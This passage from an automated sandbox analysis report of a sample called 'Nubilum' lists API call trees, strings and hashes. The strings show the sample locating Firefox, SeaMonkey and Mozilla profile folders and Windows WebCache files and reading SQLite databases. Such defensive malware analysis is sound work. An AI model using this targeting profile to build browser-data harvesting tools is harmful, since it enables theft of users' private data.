                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 00403F6B
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                          • API String ID: 4039892925-2068335096
                          • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                          • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                          APIs
                          • memset.MSVCRT ref: 00403FE1
                          • memset.MSVCRT ref: 00403FF6
                          • memset.MSVCRT ref: 0040400B
                          • memset.MSVCRT ref: 00404020
                          • memset.MSVCRT ref: 00404035
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 004040FC
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                          • API String ID: 4039892925-3369679110
                          • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                          • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                          • API String ID: 3510742995-2641926074
                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 2941347001-0
                          • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                          • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                          APIs
                          • memset.MSVCRT ref: 00403C09
                          • memset.MSVCRT ref: 00403C1E
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                          • wcscat.MSVCRT ref: 00403C47
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                          • wcscat.MSVCRT ref: 00403C70
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                          • API String ID: 1534475566-1174173950
                          • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                          • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                          APIs
                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                          • memset.MSVCRT ref: 00414C87
                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                          • wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                          Strings
                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                          • API String ID: 71295984-2036018995
                          • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                          • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                          APIs
                          • wcschr.MSVCRT ref: 00414458
                          • _snwprintf.MSVCRT ref: 0041447D
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                          • String ID: "%s"
                          • API String ID: 1343145685-3297466227
                          • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                          • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProcessTimes
                          • String ID: GetProcessTimes$kernel32.dll
                          • API String ID: 1714573020-3385500049
                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                          APIs
                          • memset.MSVCRT ref: 004087D6
                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                          • memset.MSVCRT ref: 00408828
                          • memset.MSVCRT ref: 00408840
                          • memset.MSVCRT ref: 00408858
                          • memset.MSVCRT ref: 00408870
                          • memset.MSVCRT ref: 00408888
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                          • String ID:
                          • API String ID: 2911713577-0
                          • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                          • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID: @ $SQLite format 3
                          • API String ID: 1475443563-3708268960
                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _wcsicmpqsort
                          • String ID: /nosort$/sort
                          • API String ID: 1579243037-1578091866
                          • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                          • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                          APIs
                          • memset.MSVCRT ref: 0040E60F
                          • memset.MSVCRT ref: 0040E629
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                          Strings
                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                          • API String ID: 2887208581-2114579845
                          • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                          • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                          APIs
                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                          • LockResource.KERNEL32(00000000), ref: 004148EF
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID:
                          • API String ID: 3473537107-0
                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                          APIs
                          Strings
                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: only a single result allowed for a SELECT that is part of an expression
                          • API String ID: 2221118986-1725073988
                          • Opcode ID: 62e6d944a6cbe5f9c528c34acab60ede998b043a0556ec9d199cf82d841fd078
                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                          • Opcode Fuzzy Hash: 62e6d944a6cbe5f9c528c34acab60ede998b043a0556ec9d199cf82d841fd078
                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                          APIs
                          • Sleep.KERNEL32(00000064), ref: 004175D0
                          • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ChangeCloseFindNotificationSleep
                          • String ID: }A
                          • API String ID: 1821831730-2138825249
                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@DeleteObject
                          • String ID: r!A
                          • API String ID: 1103273653-628097481
                          • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                          • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@
                          • String ID:
                          • API String ID: 1033339047-0
                          • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                          • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                          APIs
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                          • memcmp.MSVCRT ref: 00444BA5
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressProc$memcmp
                          • String ID: $$8
                          • API String ID: 2808797137-435121686
                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
